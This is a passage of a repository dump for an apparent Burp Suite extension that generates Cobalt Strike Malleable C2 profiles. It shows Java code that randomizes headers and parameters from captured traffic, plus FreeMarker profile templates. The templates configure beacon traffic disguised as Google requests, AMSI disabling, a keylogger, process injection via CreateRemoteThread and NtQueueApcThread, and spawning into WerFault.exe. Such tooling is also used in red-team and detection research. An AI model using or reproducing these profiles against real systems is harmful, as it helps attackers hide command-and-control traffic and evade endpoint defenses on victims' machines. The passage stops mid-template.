StringBuilder(); 78 | String str = "qwertyuiopasdfghjklzxcvbnmZXCVBNMLKJHGFDSAQWERTYUIOP-1234567890_"; 79 | 80 | for (int j = 0; j < randnum; j++){ 81 | StringBuilder strBuff = new StringBuilder(); 82 | //将字符str顺序打乱 83 | String[] liststr= str.split(""); 84 | Collections.shuffle(asList(liststr)); 85 | StringBuilder out= new StringBuilder(""); 86 | for(String s:liststr){ 87 | out.append(s); 88 | } 89 | str = out.toString(); 90 | int num = new Random().nextInt(10)+6; 91 | for (int i = 0 ; i < num; i++){ 92 | int number = new Random().nextInt(str.length()); 93 | strBuff.append(str.charAt(number)); 94 | } 95 | if (j == 0){ 96 | line.append("parameter \"").append(list.get(j)).append("\" \"").append(strBuff).append("\";"); 97 | }else { 98 | line.append("\r\n\t\tparameter \"").append(list.get(j)).append("\" \"").append(strBuff).append("\";"); 99 | } 100 | } 101 | return line.toString(); 102 | } 103 | public static List searchTestParam(int randnum) { 104 | List list = new ArrayList<>(); 105 | for (int i=0; i < randnum; i++){ 106 | try { 107 | list.add(new LoadFile().readLine("parameters")); 108 | } catch (IOException e) { 109 | e.printStackTrace(); 110 | } 111 | } 112 | list = list.stream().distinct().collect(Collectors.toList()); 113 | if (list.size() == randnum){ 114 | return list; 115 | }else { 116 | return searchTestParam(randnum); 117 | } 118 | } 119 | public static String lookTestHeaders(Map map){ 120 | List listall = new ArrayList<>(map.keySet()); 121 | List list = new ArrayList<>(); 122 | if (listall.size() > 3){ 123 | for (int j= 0 ; j < listall.size() ; j++){ 124 | int num = new Random().nextInt(listall.size()); 125 | list.add(listall.get(num)); 126 | } 127 | list = list.stream().distinct().collect(Collectors.toList()); 128 | }else{ 129 | list.addAll(listall); 130 | } 131 | StringBuilder line = new StringBuilder(); 132 | for (int i = 0 ; i < list.size() ; i++){ 133 | if (i == 0){ 134 | line.append("header \"").append(list.get(i)).append("\" \"").append(map.get(list.get(i))).append("\";"); 135 | }else { 136 | line.append("\r\n\t\theader \"").append(list.get(i)).append("\" \"").append(map.get(list.get(i))).append("\";"); 137 | } 138 | } 139 | return line.toString(); 140 | } 141 | 142 | public static String lookUri(List headers){ 143 | String uri = ""; 144 | for (String header : headers) { 145 | if (header.startsWith("GET")) { 146 | uri = (header.split("\\s+")[1].split("[?]")[0]); 147 | } 148 | } 149 | // System.out.println(uri); 150 | return uri; 151 | } 152 | 153 | //格式化uri 154 | public static String formatUri(String uri){ 155 | List list = asList(uri.split("/")); 156 | StringBuilder uriStr = new StringBuilder(); 157 | if(list.size() <= 6){ 158 | uriStr = new StringBuilder(uri); 159 | }else { 160 | for (int i = 1; i< 7;i ++){ 161 | uriStr.append("/").append(list.get(i)); 162 | } 163 | } 164 | return uriStr.toString(); 165 | } 166 | public static void main(String[] args) throws IOException { 167 | Map dataMap = new HashMap(); 168 | // persiancatService.dataPersiancat(); 169 | //dataMap.putAll(persiancatService.putdataPersiancat()); 170 | //dataMap.putAll(httpsCertificateService.putdataHttpsCertificate()); 171 | //dataMap.putAll(postExService.putdataPostEx()); 172 | //System.out.println(dataMap); 173 | List testlist = asList( 174 | "GET /og/_/js/k=og.qtm.en_US.spppbM4LMIk.O/rt=j/m=qabr,qgl,q_dnp,qdid,qcwid,qbg,qbd,qapid,qald/exm=qaaw,qadd,qaid,qein,qhaw,qhbr,qhch,qhga,qhid,qhin,qhpr/d=1/ed=1/rs=AA2YrTuopUsWYZY3-5Ts97yUUVoGW6GKgA HTTP/1.1","Host: www.google.com","Sec-Fetch-Dest: empty","Sec-Fetch-Dest2: empty","Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7","Content-Type: text/plain;charset=UTF-8","Referer: https://www.google.com/", 175 | "Accept-Encoding: gzip, deflate" 176 | ); 177 | // System.out.println(dataMap.size()); 178 | // String header = "Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-Jr/dv0OrZoGbY5jRuHrS/Q==' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1"; 179 | // List lists = Arrays.asList(header.split("[:]\\s+")); 180 | // String line = ""; 181 | // for (int i = 0; i < lists.size(); i++){ 182 | // if (i == 0){ 183 | // System.out.println(lists.get(0)); 184 | // }else{ 185 | // line += lists.get(i); 186 | // } 187 | // System.out.println(line); 188 | // 189 | // } 190 | // System.out.println(String.valueOf(header.split("[:]\\s+")[1]).trim()); 191 | // 192 | // new FreemarkerDemo(); 193 | // System.out.println(lookUri(testlist)); 194 | // System.out.println(formatUri(lookUri(testlist))); 195 | //dataMap = analyzeInfo.lookHeaders(testlist); 196 | //System.out.println(lookTestHeaders(analyzeInfo.lookHeaders(testlist))); 197 | System.out.println(new Random().nextInt(39999)+12500); 198 | List list = new ArrayList<>(); 199 | for (int i = 0; i< 5;i++){ 200 | list.add(i,""); 201 | } 202 | for (int i = 0; i< 5;i++){ 203 | list.set(i,"sdfsd"); 204 | } 205 | System.out.println(list); 206 | //System.out.println(new ReadFile().readLoad("testhtml").substring(0,3000)); 207 | //System.out.println(lookTestParameter()); 208 | //System.out.println(new ReadFile().readLoad("testhtml").replaceAll("\"","\\\\\"")); 209 | } 210 | 211 | public static String decodeUnicode(String str) { 212 | Charset set = StandardCharsets.UTF_16; 213 | Pattern p = Pattern.compile("\\\\u([0-9a-fA-F]{4})"); 214 | Matcher m = p.matcher(str); 215 | int start = 0; 216 | int start2 = 0; 217 | StringBuilder sb = new StringBuilder(); 218 | while (m.find(start)) { 219 | start2 = m.start(); 220 | if (start2 > start) { 221 | String seg = str.substring(start, start2); 222 | sb.append(seg); 223 | } 224 | String code = m.group(1); 225 | int i = Integer.valueOf(code, 16); 226 | byte[] bb = new byte[4]; 227 | bb[0] = (byte) ((i >> 8) & 0xFF); 228 | bb[1] = (byte) (i & 0xFF); 229 | ByteBuffer b = ByteBuffer.wrap(bb); 230 | sb.append(String.valueOf(set.decode(b)).trim()); 231 | start = m.end(); 232 | } 233 | start2 = str.length(); 234 | if (start2 > start) { 235 | String seg = str.substring(start, start2); 236 | sb.append(seg); 237 | } 238 | return sb.toString(); 239 | } 240 | //特殊字符处理 241 | public static String moBody(String body){ 242 | body = body.replaceAll("[\u4e00-\u9fa5]",""); 243 | body = body.replaceAll("\\\\","\\\\\\\\"); 244 | body = body.replaceAll("\"","\\\\\""); 245 | return body; 246 | } 247 | public static String formatHtml(String body){ 248 | String str =body.replaceAll("",""); 249 | //str = str.replaceAll("/[*](.|[\r\n])*?[*]/",""); 250 | str = str.replaceAll("\\\\","\\\\\\\\"); 251 | str = str.replaceAll("\t|\r|\n",""); 252 | return str; 253 | } 254 | public static List analyzeBody(String body){ 255 | List list = new ArrayList<>(); 256 | if(body.length() < 10000){ 257 | list.add(body.substring(0,body.length()/3).replaceAll("\"","\\\\\"")); 258 | list.add(body.substring(body.length()/3,body.length()/3*2).replaceAll("\"","\\\\\"")); 259 | list.add(body.substring(body.length()/3*2,body.length()).replaceAll("\"","\\\\\"")); 260 | }else{ 261 | int length1 = new Random().nextInt(600)+3500; 262 | int length2 = body.length()- length1; 263 | int len = (length1+length2)/2+new Random().nextInt(635)+877; 264 | list.add(body.substring(0,length1).replaceAll("\"","\\\\\"")); 265 | list.add(body.substring((length1+length2)/2,len).replaceAll("\"","\\\\\"")); 266 | list.add(body.substring(length2,body.length()).replaceAll("\"","\\\\\"")); 267 | } 268 | 269 | return list; 270 | } 271 | } 272 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/ui/C2ui.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.ui; 2 | 3 | import javax.swing.*; 4 | import java.awt.*; 5 | import java.awt.datatransfer.Clipboard; 6 | import java.awt.datatransfer.StringSelection; 7 | /** 8 | * @program: JustC2file 9 | * @author: Peithon 10 | * @create: 2022-01-08 09:09 11 | **/ 12 | public class C2ui extends JFrame{ 13 | private JTextArea resArea; 14 | private JButton button; 15 | 16 | public C2ui() { 17 | super("C2 profile generator"); 18 | JPanel codePanel = new JPanel(new GridLayout()); 19 | 20 | // 新建的GUI框存放C2 profile文件内容 21 | resArea = new JTextArea(); 22 | JScrollPane scrollPane = new JScrollPane(resArea); 23 | resArea.setEditable(false); 24 | 25 | this.add(codePanel, BorderLayout.CENTER); 26 | codePanel.add(scrollPane); 27 | 28 | // 新建Buttom用于Copy C2 profile 29 | JPanel buttonPanel = new JPanel(new FlowLayout()); 30 | button = new JButton("Copy Text"); 31 | buttonPanel.add(button); 32 | this.add(buttonPanel, BorderLayout.PAGE_END); 33 | button.addActionListener(e1 -> { 34 | Toolkit toolkit = Toolkit.getDefaultToolkit(); 35 | Clipboard clipboard = toolkit.getSystemClipboard(); 36 | StringSelection CodeToCopy = new StringSelection(this.getFile()); 37 | clipboard.setContents(CodeToCopy, CodeToCopy); 38 | }); 39 | 40 | // 设置GUI框样式 41 | this.setSize(630,530); 42 | this.setVisible(false); 43 | this.setDefaultCloseOperation(JFrame.DISPOSE_ON_CLOSE); 44 | } 45 | 46 | public void setFile(String str){ 47 | this.resArea.setText(str); 48 | } 49 | public String getFile(){ 50 | return resArea.getText(); 51 | } 52 | } 53 | -------------------------------------------------------------------------------- /src/main/resources/templates/c2profile_template.ftl: -------------------------------------------------------------------------------- 1 | ## Cobalt Strike Malleable C2 Profile 2 | ## Version: Cobalt Strike 4.2 3 | ## Date : ${timestamp} 4 | 5 | ## Profile Name 6 | ##set sample_name "${sample_name}"; 7 | 8 | ## Sleep Times 9 | set sleeptime "${sleeptime}"; 10 | set jitter "${jitter}"; 11 | 12 | ## Beacon maxdns 13 | set maxdns "${maxdns}"; 14 | 15 | ## DNS servers 16 | set dns_idle "${dns_idle}"; 17 | 18 | ## Beacon User-Agent 19 | set useragent "${useragent}"; 20 | 21 | ## Self-signed SSL Certificates with SSL Beacon 22 | ## Stager 23 | https-certificate { 24 | 25 | set C "${https_certificate_C}"; 26 | set CN "${https_certificate_CN}"; 27 | set O "${https_certificate_O}"; 28 | set OU "${https_certificate_OU}"; 29 | set validity "${https_certificate_V}"; 30 | } 31 | 32 | ##Valid SSL Certificates with SSL Beacon 33 | ##https-certificate { 34 | ## set keystore "domain.store"; 35 | ## set password "mypassword"; 36 | ##} 37 | 38 | ##DNS Beacons 39 | ##dns-beacon “optional-variant-name” { 40 | ## # Options moved into 'dns-beacon' group in 4.3: 41 | ## set dns_idle "1.2.3.4"; 42 | ## set dns_max_txt "199"; 43 | ## set dns_sleep "1"; 44 | ## set dns_ttl "5"; 45 | ## set maxdns "200"; 46 | ## set dns_stager_prepend "doc-stg-prepend"; 47 | ## set dns_stager_subhost "doc-stg-sh."; 48 | ## 49 | ## # DNS subhost override options added in 4.3: 50 | ## set beacon "doc.bc."; 51 | ## set get_A "doc.1a."; 52 | ## set get_AAAA "doc.4a."; 53 | ## set get_TXT "doc.tx."; 54 | ## set put_metadata "doc.md."; 55 | ## set put_output "doc.po."; 56 | ## set ns_response "zero"; 57 | ##} 58 | 59 | ##Code Signing Certificate 60 | ##code-signer { 61 | ## set keystore "keystore.jks"; 62 | ## set password "password"; 63 | ## set alias "server"; 64 | ##} 65 | 66 | ## Staging process 67 | set host_stage "${host_stage}"; 68 | 69 | http-stager { 70 | set uri_x86 "/webapi/v6/Update"; 71 | set uri_x64 "/webapi/v3/Update"; 72 | 73 | server { 74 | header "Content-Type" "application/octet-stream"; 75 | header "Connection" "Keep-Alive"; 76 | header "Server" "Apache"; 77 | output { 78 | #prepend " "; 79 | #append ""; 80 | print; 81 | 82 | } 83 | } 84 | 85 | client { 86 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 87 | } 88 | } 89 | 90 | ## SSH beacons 91 | ##Note that the format is word_##, where CS will auto include a two digit number in the "##" field. 92 | set ssh_banner "Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-1065-aws x86_64)"; 93 | set ssh_pipename "SearchText_##"; 94 | 95 | ##http-config 96 | http-config { 97 | set headers "Date,Server, Content-Length, Keep-Alive, 98 | Connection, Content-Type"; 99 | header "Server" "Apache"; 100 | header "Keep-Alive" "timeout=10, max=100"; 101 | header "Connection" "Keep-Alive"; 102 | 103 | #This option decides if Cobalt Strike uses the X-Forwarded-For HTTP header to determine the remote address of a request. 104 | #Use this option if your Cobalt Strike server is behind an HTTP redirector. 105 | set trust_x_forwarded_for "true"; 106 | #By default, requests from user agents that start with curl, lynx, or wget are all blocked 107 | #set block_useragents "curl*,lynx*,wget*"; 108 | } 109 | 110 | ## Post Exploitation 111 | post-ex { 112 | set spawnto_x86 "%windir%\\syswow64\\WerFault.exe"; 113 | set spawnto_x64 "%windir%\\sysnative\\WerFault.exe"; 114 | set obfuscate "true"; 115 | set smartinject "true"; 116 | set amsi_disable "true"; 117 | set pipename "msrpc_####"; 118 | set keylogger "GetAsyncKeyState"; 119 | #set thread_hint ""; # specify as module!function+0x## 120 | } 121 | 122 | ## HTTP GET 123 | http-get { 124 | 125 | set uri "${http_get_uri}"; 126 | 127 | client { 128 | 129 | header "Accept-Encoding" "gzip, deflate"; 130 | header "Host" "${http_get_host}"; 131 | 132 | metadata { 133 | base64; 134 | prepend "session-token="; 135 | prepend "__Secure-3PAPISID=noskin;"; 136 | append "CONSENT=YES+CN.zh-CN+20210917-09-0"; 137 | header "Cookie"; 138 | } 139 | } 140 | 141 | server { 142 | 143 | header "Server" "${http_getReq_Server}"; 144 | header "Cache-Control" "private, max-age=0"; 145 | header "X-Frame-Options" "SAMEORIGIN"; 146 | header "Content-Encoding" "gzip"; 147 | 148 | output { 149 | print; 150 | } 151 | } 152 | } 153 | 154 | ## HTTP POST 155 | http-post { 156 | 157 | set uri "${http_post_uri}"; 158 | 159 | client { 160 | 161 | header "Accept" "*/*"; 162 | header "Content-Type" "${http_post_request_content}"; 163 | ${random_header} 164 | header "Host" "${http_post_host}"; 165 | 166 | parameter ${http_post_parameter1}; 167 | 168 | id { 169 | parameter "${http_post_id}"; 170 | } 171 | 172 | parameter ${http_post_parameter2}; 173 | 174 | output { 175 | ${http_post_encode} 176 | print; 177 | } 178 | } 179 | 180 | server { 181 | 182 | header "Server" "${http_post_server}"; 183 | header "Content-Type" "${http_post_response_content}"; 184 | header "Connection" "${Connection}"; 185 | header "X-Frame-Options" "SAMEORIGIN"; 186 | 187 | output { 188 | print; 189 | } 190 | } 191 | } -------------------------------------------------------------------------------- /src/main/resources/templates/c2profile_template4.2.ftl: -------------------------------------------------------------------------------- 1 | ## Cobalt Strike Malleable C2 Profile 2 | ## Version: Cobalt Strike 4.2 3 | ## Date : ${timestamp} 4 | 5 | ## Profile Name 6 | ##set sample_name "${sample_name}"; 7 | 8 | ## Sleep Times 9 | set sleeptime "${sleeptime}"; 10 | set jitter "${jitter}"; 11 | set data_jitter "${data_jitter}"; 12 | 13 | ## Beacon User-Agent 14 | set useragent "${useragent}"; 15 | 16 | ## Self-signed SSL Certificates with SSL Beacon 17 | ## Stager 18 | https-certificate { 19 | set C "${https_certificate_C}"; 20 | set CN "${https_certificate_CN}"; 21 | set O "${https_certificate_O}"; 22 | set OU "${https_certificate_OU}"; 23 | set validity "${https_certificate_V}"; 24 | } 25 | 26 | ## TCP Beacon 27 | set tcp_port "${tcp_port}"; 28 | set tcp_frame_header "\x80"; 29 | 30 | ## SMB beacons 31 | set pipename "mojo.5688.8052.183894939787088877##"; 32 | set pipename_stager "mojo.5688.8052.35780273329370473##"; 33 | set smb_frame_header "\x80"; 34 | 35 | ## DNS beacons 36 | set maxdns "${maxdns}"; 37 | set dns_max_txt "${dns_max_txt}"; 38 | set dns_idle "${dns_idle}"; 39 | set dns_sleep "${dns_sleep}"; 40 | set dns_stager_prepend "${dns_stager_prepend}"; 41 | set dns_stager_subhost "${dns_stager_subhost}"; 42 | 43 | ## SSH beacons 44 | set ssh_banner "OpenSSH_7.4 Debian (protocol 2.0)"; 45 | set ssh_pipename "wkssvc##"; 46 | 47 | #code-signer { 48 | # set keystore "keystore.jks"; 49 | # set password "123456"; 50 | # set alias "google"; 51 | #} 52 | 53 | ## Staging process 54 | set host_stage "${host_stage}"; 55 | http-stager { 56 | set uri_x86 "${stager_uri_x86}"; 57 | set uri_x64 "${stager_uri_x64}"; 58 | 59 | server { 60 | header "Content-Type" "${stager_server_ContentType}"; 61 | header "Server" "${stager_server_Server}"; 62 | ${stager_server_header1} 63 | ${stager_server_header2} 64 | ${stager_server_header3} 65 | ${stager_server_header4} 66 | output { 67 | prepend "${stager_output_prepend}"; 68 | prepend "${stager_output_prepend2}"; 69 | append "${stager_output_append}"; 70 | print; 71 | } 72 | } 73 | 74 | client { 75 | header "Accept" "${stager_client_Accept}"; 76 | header "Accept-Language" "en-US,en;q=0.5"; 77 | header "Accept-Encoding" "gzip, deflate"; 78 | } 79 | } 80 | 81 | ## Post Exploitation 82 | post-ex { 83 | set spawnto_x86 "${spawnto_x86}"; 84 | set spawnto_x64 "${spawnto_x64}"; 85 | set obfuscate "true"; 86 | set smartinject "true"; 87 | set amsi_disable "true"; 88 | set pipename "${pipename}"; 89 | set keylogger "GetAsyncKeyState"; 90 | } 91 | 92 | <#--## Memory Indicators--> 93 | <#--stage {--> 94 | <#-- # CS 4.2 added allocator and MZ header overrides--> 95 | <#-- set allocator "VirtualAlloc";--> 96 | <#-- set magic_pe "NO";--> 97 | <#-- set userwx "false";--> 98 | <#-- set stomppe "true";--> 99 | <#-- set obfuscate "true";--> 100 | <#-- set cleanup "true";--> 101 | <#-- set sleep_mask "true";--> 102 | <#-- set smartinject "true";--> 103 | 104 | <#-- set checksum "0";--> 105 | <#-- set compile_time "11 Nov 2022 04:08:32";--> 106 | <#-- set entry_point "650688";--> 107 | <#-- set image_size_x86 "4661248";--> 108 | <#-- set image_size_x64 "4661248";--> 109 | <#-- set name "srv.dll";--> 110 | <#-- set rich_header "\x3e\x98\xfe\x75\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x73\x81\x03\x26\xfc\xf9\x90\x26\x17\xa4\x93\x27\x79\xf9\x90\x26\x7a\xf9\x91\x26\x83\xfd\x90\x26\x17\xa4\x91\x27\x65\xf9\x90\x26\x17\xa4\x95\x27\x77\xf9\x90\x26\x17\xa4\x94\x27\x6c\xf9\x90\x26\x17\xa4\x9e\x27\x56\xf8\x90\x26\x17\xa4\x6f\x26\x7b\xf9\x90\x26\x17\xa4\x92\x27\x7b\xf9\x90\x26\x52\x69\x63\x68\x7a\xf9\x90\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";--> 111 | 112 | <#-- transform-x86 {--> 113 | <#-- prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90";--> 114 | <#-- strrep "ReflectiveLoader" "execute";--> 115 | <#-- strrep "This program cannot be run in DOS mode" "";--> 116 | <#-- strrep "beacon.dll" "";--> 117 | <#-- }--> 118 | <#-- transform-x64 {--> 119 | <#-- prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90";--> 120 | <#-- strrep "ReflectiveLoader" "execute";--> 121 | <#-- strrep "beacon.x64.dll" "";--> 122 | <#-- }--> 123 | 124 | <#-- stringw "jQ"; # Add this string to the DLL--> 125 | <#--}--> 126 | 127 | <#--## Process Injection--> 128 | process-inject { 129 | 130 | set allocator "NtMapViewOfSection"; 131 | set min_alloc "17500"; 132 | set startrwx "false"; 133 | set userwx "false"; 134 | 135 | transform-x86 { 136 | prepend "\x90\x90"; 137 | } 138 | 139 | transform-x64 { 140 | prepend "\x90\x90"; 141 | append "\x90\x90"; 142 | } 143 | 144 | 145 | execute { 146 | # The order is important! Each step will be attempted (if applicable) until successful 147 | ## self-injection 148 | CreateThread "ntdll!RtlUserThreadStart+0x42"; 149 | CreateThread; 150 | ## Injection via suspened processes (SetThreadContext|NtQueueApcThread-s) 151 | # SetThreadContext; 152 | NtQueueApcThread-s; 153 | # CreateRemotThread - Vanilla cross process injection technique. Doesn't cross session boundaries 154 | CreateRemoteThread; 155 | # RtlCreateUserThread - Supports all architecture dependent corner cases (e.g., 32bit -> 64bit injection) AND injection across session boundaries 156 | RtlCreateUserThread; 157 | } 158 | } 159 | 160 | ## HTTP Headers 161 | http-config { 162 | set headers "Date, Server, Content-Length, Keep-Alive, Connection, Content-Type"; 163 | header "Server" "Apache"; 164 | header "Keep-Alive" "timeout=10, max=100"; 165 | header "Connection" "Keep-Alive"; 166 | # Use this option if your teamserver is behind a redirector 167 | set trust_x_forwarded_for "true"; 168 | } 169 | 170 | ## HTTP GET 171 | http-get { 172 | 173 | set uri "${http_get_uri}"; 174 | set verb "GET"; 175 | 176 | client { 177 | 178 | header "Accept-Encoding" "gzip, deflate"; 179 | ${get_client_header1} 180 | ${get_client_header2} 181 | ${get_client_header3} 182 | ${get_client_header4} 183 | #header "Host" "${http_get_host}"; 184 | 185 | metadata { 186 | base64url; 187 | prepend "ANID="; 188 | prepend "__Secure-3PAPISID=noskin;"; 189 | append ";CONSENT=YES+CN.zh-CN+20210917-09-0"; 190 | header "Cookie"; 191 | } 192 | } 193 | 194 | server { 195 | 196 | header "Server" "${http_getReq_Server}"; 197 | header "Content-Type" "${http_getReq_ContentType}"; 198 | ${get_server_header1} 199 | ${get_server_header2} 200 | ${get_server_header3} 201 | ${get_server_header4} 202 | output { 203 | ${get_server_encode} 204 | prepend "${get_server_prepend}"; 205 | prepend "${get_server_prepend2}"; 206 | append "${get_server_append}"; 207 | print; 208 | } 209 | } 210 | } 211 | 212 | ## HTTP POST 213 | http-post { 214 | 215 | set uri "${http_post_uri}"; 216 | set verb "POST"; 217 | 218 | client { 219 | 220 | header "Content-Type" "${post_client_content}"; 221 | ${post_client_header1} 222 | ${post_client_header2} 223 | ${post_client_header3} 224 | ${post_client_header4} 225 | #header "Host" "${http_post_host}"; 226 | 227 | id { 228 | base64url; 229 | parameter "__formid"; 230 | } 231 | 232 | ${post_client_parameter1} 233 | ${post_client_parameter2} 234 | ${post_client_parameter3} 235 | output { 236 | base64url; 237 | prepend "aid_=522005705&accver=1&showtype=embed&ua="; 238 | print; 239 | } 240 | } 241 | 242 | server { 243 | 244 | header "Server" "${post_server_server}"; 245 | header "Content-Type" "${post_server_content}"; 246 | ${post_server_header1} 247 | ${post_server_header2} 248 | ${post_server_header3} 249 | ${post_server_header4} 250 | output { 251 | ${post_server_encode} 252 | prepend "${post_server_prepend}"; 253 | prepend "${post_server_prepend2}"; 254 | append "${post_server_append}"; 255 | print; 256 | } 257 | } 258 | } 259 | -------------------------------------------------------------------------------- /src/main/resources/templates/c2profile_template4.4.ftl: -------------------------------------------------------------------------------- 1 | ## Cobalt Strike Malleable C2 Profile 2 | ## Version: Cobalt Strike 4.4 3 | ## Date : ${timestamp} 4 | 5 | ## Profile Name 6 | ##set sample_name "${sample_name}"; 7 | 8 | ## Sleep Times 9 | set sleeptime "${sleeptime}"; 10 | set jitter "${jitter}"; 11 | set data_jitter "${data_jitter}"; 12 | 13 | ## Beacon User-Agent 14 | set useragent "${useragent}"; 15 | 16 | ## Self-signed SSL Certificates with SSL Beacon 17 | ## Stager 18 | https-certificate { 19 | set C "${https_certificate_C}"; 20 | set CN "${https_certificate_CN}"; 21 | set O "${https_certificate_O}"; 22 | set OU "${https_certificate_OU}"; 23 | set validity "${https_certificate_V}"; 24 | } 25 | 26 | ## TCP Beacon 27 | set tcp_port "${tcp_port}"; 28 | set tcp_frame_header "\x80"; 29 | 30 | ## SMB beacons 31 | set pipename "mojo.5688.8052.183894939787088877##"; 32 | set pipename_stager "mojo.5688.8052.35780273329370473##"; 33 | set smb_frame_header "\x80"; 34 | 35 | ## DNS beacons 36 | dns-beacon { 37 | # Options moved into "dns-beacon" group in version 4.3 38 | set maxdns "${maxdns}"; 39 | set dns_max_txt "${dns_max_txt}"; 40 | set dns_idle "${dns_idle}"; 41 | set dns_sleep "${dns_sleep}"; 42 | set dns_stager_prepend "${dns_stager_prepend}"; 43 | set dns_stager_subhost "${dns_stager_subhost}"; 44 | set dns_ttl "5"; 45 | 46 | # DNS subhosts override options, added in version 4.3 47 | set beacon "a.bc."; 48 | set get_A "b.1a."; 49 | set get_AAAA "c.4a."; 50 | set get_TXT "d.tx."; 51 | set put_metadata "e.md."; 52 | set put_output "f.po."; 53 | set ns_response "zero"; 54 | 55 | } 56 | 57 | 58 | ## SSH beacons 59 | set ssh_banner "OpenSSH_7.4 Debian (protocol 2.0)"; 60 | set ssh_pipename "wkssvc##"; 61 | 62 | #code-signer { 63 | # set keystore "keystore.jks"; 64 | # set password "123456"; 65 | # set alias "google"; 66 | #} 67 | 68 | ## Staging process 69 | set host_stage "${host_stage}"; 70 | http-stager { 71 | set uri_x86 "${stager_uri_x86}"; 72 | set uri_x64 "${stager_uri_x64}"; 73 | 74 | server { 75 | header "Content-Type" "${stager_server_ContentType}"; 76 | header "Server" "${stager_server_Server}"; 77 | ${stager_server_header1} 78 | ${stager_server_header2} 79 | ${stager_server_header3} 80 | ${stager_server_header4} 81 | output { 82 | prepend "${stager_output_prepend}"; 83 | prepend "${stager_output_prepend2}"; 84 | append "${stager_output_append}"; 85 | print; 86 | } 87 | } 88 | 89 | client { 90 | header "Accept" "${stager_client_Accept}"; 91 | header "Accept-Language" "en-US,en;q=0.5"; 92 | header "Accept-Encoding" "gzip, deflate"; 93 | } 94 | } 95 | 96 | ## Post Exploitation 97 | post-ex { 98 | set spawnto_x86 "${spawnto_x86}"; 99 | set spawnto_x64 "${spawnto_x64}"; 100 | set obfuscate "true"; 101 | set smartinject "true"; 102 | set amsi_disable "true"; 103 | set pipename "${pipename}"; 104 | set keylogger "GetAsyncKeyState"; 105 | } 106 | 107 | <#--## Memory Indicators--> 108 | <#--stage {--> 109 | <#-- # CS 4.2 added allocator and MZ header overrides--> 110 | <#-- set allocator "VirtualAlloc";--> 111 | <#-- set magic_pe "NO";--> 112 | <#-- set userwx "false";--> 113 | <#-- set stomppe "true";--> 114 | <#-- set obfuscate "true";--> 115 | <#-- set cleanup "true";--> 116 | <#-- set sleep_mask "true";--> 117 | <#-- set smartinject "true";--> 118 | 119 | <#-- set checksum "0";--> 120 | <#-- set compile_time "11 Nov 2022 04:08:32";--> 121 | <#-- set entry_point "650688";--> 122 | <#-- set image_size_x86 "4661248";--> 123 | <#-- set image_size_x64 "4661248";--> 124 | <#-- set name "srv.dll";--> 125 | <#-- set rich_header "\x3e\x98\xfe\x75\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x73\x81\x03\x26\xfc\xf9\x90\x26\x17\xa4\x93\x27\x79\xf9\x90\x26\x7a\xf9\x91\x26\x83\xfd\x90\x26\x17\xa4\x91\x27\x65\xf9\x90\x26\x17\xa4\x95\x27\x77\xf9\x90\x26\x17\xa4\x94\x27\x6c\xf9\x90\x26\x17\xa4\x9e\x27\x56\xf8\x90\x26\x17\xa4\x6f\x26\x7b\xf9\x90\x26\x17\xa4\x92\x27\x7b\xf9\x90\x26\x52\x69\x63\x68\x7a\xf9\x90\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";--> 126 | 127 | <#-- transform-x86 {--> 128 | <#-- prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90";--> 129 | <#-- strrep "ReflectiveLoader" "execute";--> 130 | <#-- strrep "This program cannot be run in DOS mode" "";--> 131 | <#-- strrep "beacon.dll" "";--> 132 | <#-- }--> 133 | <#-- transform-x64 {--> 134 | <#-- prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90";--> 135 | <#-- strrep "ReflectiveLoader" "execute";--> 136 | <#-- strrep "beacon.x64.dll" "";--> 137 | <#-- }--> 138 | 139 | <#-- stringw "jQ"; # Add this string to the DLL--> 140 | <#--}--> 141 | 142 | <#--## Process Injection--> 143 | process-inject { 144 | 145 | set allocator "NtMapViewOfSection"; 146 | set min_alloc "17500"; 147 | set startrwx "false"; 148 | set userwx "false"; 149 | 150 | transform-x86 { 151 | prepend "\x90\x90"; 152 | } 153 | 154 | transform-x64 { 155 | prepend "\x90\x90"; 156 | append "\x90\x90"; 157 | } 158 | 159 | 160 | execute { 161 | # The order is important! Each step will be attempted (if applicable) until successful 162 | ## self-injection 163 | CreateThread "ntdll!RtlUserThreadStart+0x42"; 164 | CreateThread; 165 | ## Injection via suspened processes (SetThreadContext|NtQueueApcThread-s) 166 | # SetThreadContext; 167 | NtQueueApcThread-s; 168 | # CreateRemotThread - Vanilla cross process injection technique. Doesn't cross session boundaries 169 | CreateRemoteThread; 170 | # RtlCreateUserThread - Supports all architecture dependent corner cases (e.g., 32bit -> 64bit injection) AND injection across session boundaries 171 | RtlCreateUserThread; 172 | } 173 | } 174 | 175 | ## HTTP Headers 176 | http-config { 177 | set headers "Date, Server, Content-Length, Keep-Alive, Connection, Content-Type"; 178 | header "Server" "Apache"; 179 | header "Keep-Alive" "timeout=10, max=100"; 180 | header "Connection" "Keep-Alive"; 181 | # Use this option if your teamserver is behind a redirector 182 | set trust_x_forwarded_for "true"; 183 | set block_useragents "curl*,lynx*,wget*"; 184 | } 185 | 186 | ## HTTP GET 187 | http-get { 188 | 189 | set uri "${http_get_uri}"; 190 | set verb "GET"; 191 | 192 | client { 193 | 194 | header "Accept-Encoding" "gzip, deflate"; 195 | ${get_client_header1} 196 | ${get_client_header2} 197 | ${get_client_header3} 198 | ${get_client_header4} 199 | #header "Host" "${http_get_host}"; 200 | 201 | metadata { 202 | base64url; 203 | prepend "ANID="; 204 | prepend "__Secure-3PAPISID=noskin;"; 205 | append ";CONSENT=YES+CN.zh-CN+20210917-09-0"; 206 | header "Cookie"; 207 | } 208 | } 209 | 210 | server { 211 | 212 | header "Server" "${http_getReq_Server}"; 213 | header 